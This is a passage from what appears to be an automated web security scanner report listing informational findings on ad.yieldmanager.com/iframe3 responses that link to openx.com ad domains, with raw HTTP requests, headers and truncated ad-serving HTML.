<a href="http://ad.yieldmanager.com/clk?3,eAGlTstugzAQ.Bpu1LKxeQn1AKFUqAE1FW1ELojYToAApoYqlK-PVaL8QFer3ZnR7GgR9iCBGNmmY1guJZhRD2GD2obr8pLo0PM8bNrEhgjZhj7GAfNDBGN.80Ktnf9XoRu-rUjN0PF3YmXvjg-uIQBEyOS6St-
...[SNIP]...
7JPkf50tb5.U91.6zr1TQNGvY1I1LNwCRLxmcgBt7PgIpOieVJgqFSpkjyk-RjpeGQQM2wFtHzmilmmdBVnB4VrvuRy6mQZc9EV.Q.3ZHLouKSK0MrqHLcAG8-c6A=,http://psa-d.openx.com/w/1.0/rc?cs=4e3c55af5608c&cb=1317601384_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?auid=34602&cs=4e3c55af5608c&cb=1317601384_HERE" border="0" alt="">
</a>
...[SNIP]...

19.20. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACWc6QAAAAAAD9DKAAAAAAAAAD8AQIAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABdO3UpUuXRCtH41YeIIIYVhQXJm.UUgBfjPNRwAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6510%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D1015001637%26r%3D0%26s%3D2126909,1b9da9a4-ed56-11e0-b550-78e7d1f5c928,1317601490740 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=300x250&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:24:51 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0045.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:24:51 GMT
Pragma: no-cache
Content-Length: 1590
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777494);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c3f8146bae" name="4e3c3f8146bae" src="http://psa-d.openx.com/w/1.0/afr?auid=34589&cb=1317601490_HERE" frameborder="0" scrolling="no" width="300" height="250">
<a href="http://ad.yieldmanager.com/clk?3,eAGlTctugzAQ.BpuyPIrPIR6MHGRUEPSVKQovSBsTEEEnDpUSfP1dUvFD3S12p0Zzc4iEokQS7zyVwQiSkUTRohg6WNBhN-4MIoi3yM0RBAH7iWNa8YRTNm6kN6e.RYP-dOM7OQB26czew4YuHIAqDbZdZY-sgA
...[SNIP]...
zus-KIjvf-a7ccsgfXbafp7BDm4MR2DSZT1eoG9FmNNyD1YMWqMeDcWlNiVGPUpXUIp9DB3l2Pqqst81boh0thcTdelJlKU421HsrxcxDKlK0yyhpOWlrHNzVTcxM=,http://psa-d.openx.com/w/1.0/rc?cs=4e3c3f8146bae&cb=1317601490_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?auid=34589&cs=4e3c3f8146bae&cb=1317601490_HERE" border="0" alt="">
</a>
...[SNIP]...

19.21. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACEc6QAAAAAAD9DKAAAAAAAAAD8AQoAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABvw6jyduDRCg4QD1i4TzbLyWhZtF.hiieCuuvfAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6509%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D160x600%26_salt%3D483988786%26r%3D0%26s%3D2126909,35e534ce-ed53-11e0-bf34-78e7d15f8c2e,1317600246339 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=160x600&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:04:07 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0147.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:04:07 GMT
Pragma: no-cache
Content-Length: 1598
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777476);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c55af5608c" name="4e3c55af5608c" src="http://psa-d.openx.com/w/1.0/afr?auid=34602&cb=1317600246_HERE" frameborder="0" scrolling="no" width="160" height="600">
<a href="http://ad.yieldmanager.com/clk?3,eAGlT11rg0AQ.DW-yXEfagzSB83VIM2lDdiU-iJ6d1Yb9expifXX96ghf6DLsjszzA4sIgEkriDc2Xol5G7l-QEimG-QTyoH2TAIAuxh7Lp4A317TCIRUgSTcPfIvVP4V3RLn1ZkJvXDk1rZix-CKwXAUZpdV-m
...[SNIP]...
HpuXves5.s9pK5f7DtepoGi4QWjk0LMOlCyBmoQfYz4KozYlFpMNTGFGtZaTnWFqEOtLC3qF42wjDPhVvDeWlw049ST7kueqG6vP.uSqnzWmppDK3ixvELaqNzOw==,http://psa-d.openx.com/w/1.0/rc?cs=4e3c55af5608c&cb=1317600246_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?auid=34602&cs=4e3c55af5608c&cb=1317600246_HERE" border="0" alt="">
</a>
...[SNIP]...

19.22. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACWc6QAAAAAAD9DKAAAAAAAAAD8AQIAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADrPTHAKuXRCrRs-F0rhsku0Gj1Ru284H.9wuMPAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6510%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D674281344%26r%3D0%26s%3D2126909,03954f4c-ed56-11e0-8f97-78e7d16291d6,1317601450420 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=300x250&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:24:10 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0058.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:24:10 GMT
Pragma: no-cache
Content-Length: 1590
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777494);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c3f8146bae" name="4e3c3f8146bae" src="http://psa-d.openx.com/w/1.0/afr?auid=34589&cb=1317601450_HERE" frameborder="0" scrolling="no" width="300" height="250">
<a href="http://ad.yieldmanager.com/clk?3,eAGlTUFugzAQfA03ZBlwCAj1YGIh0YakqdxG4YKIbUogYGJcheb1dUuUD3S12p0Zzc46XlQhzlAYBmXlVRw6fuR4Llu6ZVgKYcMoMtxfBhChBbTHNOaYODDFqz3zd.ivSEheZmQmCfAundlrgMGVAICkyq6zdMk
...[SNIP]...
e8zejhe0uTdnPPMfdPtl1rPVgettzENAdalVxMQA6inwCTnRHLSoGhNqZEiUqJsbY8gqDl-jfZixM3zF84v5wdDT71o1C6UGXPZVf0X91RqKIWShjDWTLj-AHacXQ9,http://psa-d.openx.com/w/1.0/rc?cs=4e3c3f8146bae&cb=1317601450_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?auid=34589&cs=4e3c3f8146bae&cb=1317601450_HERE" border="0" alt="">
</a>
...[SNIP]...

19.23. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACWc6QAAAAAAD9DKAAAAAAAAAD8AQIAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB9iqfco-XRCho0v64L3BCG3gTMyQdRQv3hcKiaAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6510%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D2023593981%26r%3D0%26s%3D2126909,4bb2c796-ed56-11e0-aee5-78e7d1f5283c,1317601571409 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=300x250&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:26:12 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0140.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:26:12 GMT
Pragma: no-cache
Content-Length: 1590
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777494);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c3f8146bae" name="4e3c3f8146bae" src="http://psa-d.openx.com/w/1.0/afr?auid=34589&cb=1317601571_HERE" frameborder="0" scrolling="no" width="300" height="250">
<a href="http://ad.yieldmanager.com/clk?3,eAGlTttugzAM.RreUJSES0FoD6FRJbZSrRMdoy-oTdLSC4QFpiK-fu6o-gOzLPsc6.jYxIl86QUChwfpeXtMZ0FEHCpmkL4kNo6iiNKQzjAUbHdJLBknOGHzXPhr9hc85G8TgsoDtk4m9h4wdOMIudqkt2n0nQb
...[SNIP]...
0mL2lekPR8HIvHn7D.YttV37eWwyy6gJSoNzupBqRb1QxI6BqGu4NBbQWihVEHo7rKcriLLeqPulEnCcz3yJ2LPeBT0ynTl2bXSF2XzU-9V6aslFEguGoBil.KdnOh,http://psa-d.openx.com/w/1.0/rc?cs=4e3c3f8146bae&cb=1317601571_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?auid=34589&cs=4e3c3f8146bae&cb=1317601571_HERE" border="0" alt="">
</a>
...[SNIP]...

19.24. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACEc6QAAAAAAD9DKAAAAAAAAAD8AQoAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH69wUQOHRCv9MHx.3PKFz3fZJ9-fCzQ0g9tFzAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6509%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D160x600%26_salt%3D3225121083%26r%3D0%26s%3D2126909,ae6958ee-ed53-11e0-a045-78e7d16242a4,1317600448532 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=160x600&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:07:29 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0361.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:07:29 GMT
Pragma: no-cache
Content-Length: 1590
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777476);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c55af5608c" name="4e3c55af5608c" src="http://psa-d.openx.com/w/1.0/afr?auid=34602&cb=1317600448_HERE" frameborder="0" scrolling="no" width="160" height="600">
<a href="http://ad.yieldmanager.com/clk?3,eAGljN1OhDAQhZ-GO9K05WchxIuylQ26RTcha.SGQFtk5adYMIv79DZieAEnk5nvTM4c5ERyh2vIPeFBWEEkcYQczHeo8pw6tGEURRhBHDrYC1x7SmNBKIIp2d9z.0R-i4b0cSUzaUBOalXPAQFXCoCrNLuup08
...[SNIP]...
loWf76ndGHJtseyZ1tN.M8Wg6xcGJagFmXQi5AjXJYAFe9OZa1BmNjTImWtZZTYznUhRb2b2qQF2GU78HQaF4ZvgyT1HOhy0Govhi--krqopFaGkOnuHH8AHUvcuY=,http://psa-d.openx.com/w/1.0/rc?cs=4e3c55af5608c&cb=1317600448_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?auid=34602&cs=4e3c55af5608c&cb=1317600448_HERE" border="0" alt="">
</a>
...[SNIP]...

19.25. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACWc6QAAAAAAD9DKAAAAAAAAAD8AQIAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4DO22ieTRCiOMa5z1rlqYYUPPtX1VmeU.ja22AAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6510%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D3184333582%26r%3D0%26s%3D2126909,a3cc6f28-ed55-11e0-9781-5fce54d5fb11,1317601289720 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=300x250&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:21:30 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0097.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:21:30 GMT
Pragma: no-cache
Content-Length: 1598
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777494);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c3f8146bae" name="4e3c3f8146bae" src="http://psa-d.openx.com/w/1.0/afr?auid=34589&cb=

1317601289_HERE" frameborder="0" scrolling="no" width="300" height="250">
<a href="http://ad.yieldmanager.com/clk?3,eAGlj11rgzAUhn-Ndy7kq34gu4g6i6yRCbWlvRGrsXarxkVHxV-.dJb-gR3CyfsenvOGIOJRRKiNXLuCWNTUtT1EcGljB9uOZULP8zCBGrBdC5lD7FcsRDBmwb60UvZXoRu-L0r30GFpvLgPh4FbCACVit-W0Td
...[SNIP]...
hZp-jYxhN.fEnvv5pmM469QZiBI30qMKqiEhOQvegmUMpWD4tagb7RUKRErcTQGCSk0MDWLDtxqbSzVujuy5PWl24QasxV0VWyzbuf9iRU3gglNHCVpSZ-AQtScc8=,http://psa-

d.openx.com/w/1.0/rc?cs=4e3c3f8146bae&cb=1317601289_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?

auid=34589&cs=4e3c3f8146bae&cb=1317601289_HERE" border="0" alt="">
</a>
...[SNIP]...

19.26. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACWc6QAAAAAAD9DKAAAAAAAAAD8AQIAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABIom7hIeDRCnDEpH0AyJ31wNw6CoxcIwypJaJXAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6510%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D2085053475%26r%3D0%26s%3D2126909,03906192-ed53-11e0-ba3a-78e7d15f6a8a,1317600161897 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=300x250&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:03:13 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0123.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:03:13 GMT
Pragma: no-cache
Content-Length: 1590
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777494);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c3f8146bae" name="4e3c3f8146bae" src="http://psa-d.openx.com/w/1.0/afr?auid=34589&cb=

1317600161_HERE" frameborder="0" scrolling="no" width="300" height="250">
<a href="http://ad.yieldmanager.com/clk?3,eAGlT9tugzAM.RreUERIuAntITRDQmu6VYqKuhcUIAxEISxlKuPrl42qPzDLss-xjo9liOIIRzAQjcACo0hEYQyRWwUw8Evk2k4cx9jxoYeCwIP2NUtqQqGTkV1e-UfyFzSiLxsylYbkmG3sLSTgRgHASrPbNvp
...[SNIP]...
ndM34aDsMzPt9fMvtPtt3O82QhYrmpyRrMWtRyAWqS4wIqNZihaDSYWiNKtWy0vLYWotixXH9Vo-xqw3wP.vKqNLgbr1LPhRZjrYZi.BpKqYtWamkEF1UZxQ8.jHL4,http://psa-

d.openx.com/w/1.0/rc?cs=4e3c3f8146bae&cb=1317600161_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?

auid=34589&cs=4e3c3f8146bae&cb=1317600161_HERE" border="0" alt="">
</a>
...[SNIP]...

19.27. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACEc6QAAAAAAD9DKAAAAAAAAAD8AQoAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABKtxdDl-TRCl0t8tKcSElDV6C7bJRQgwnhGiL4AAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6509%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D160x600%26_salt%3D552373029%26r%3D0%26s%3D2126909,abfde780-ed55-11e0-b755-78e7d15fbc50,1317601303466 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=160x600&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
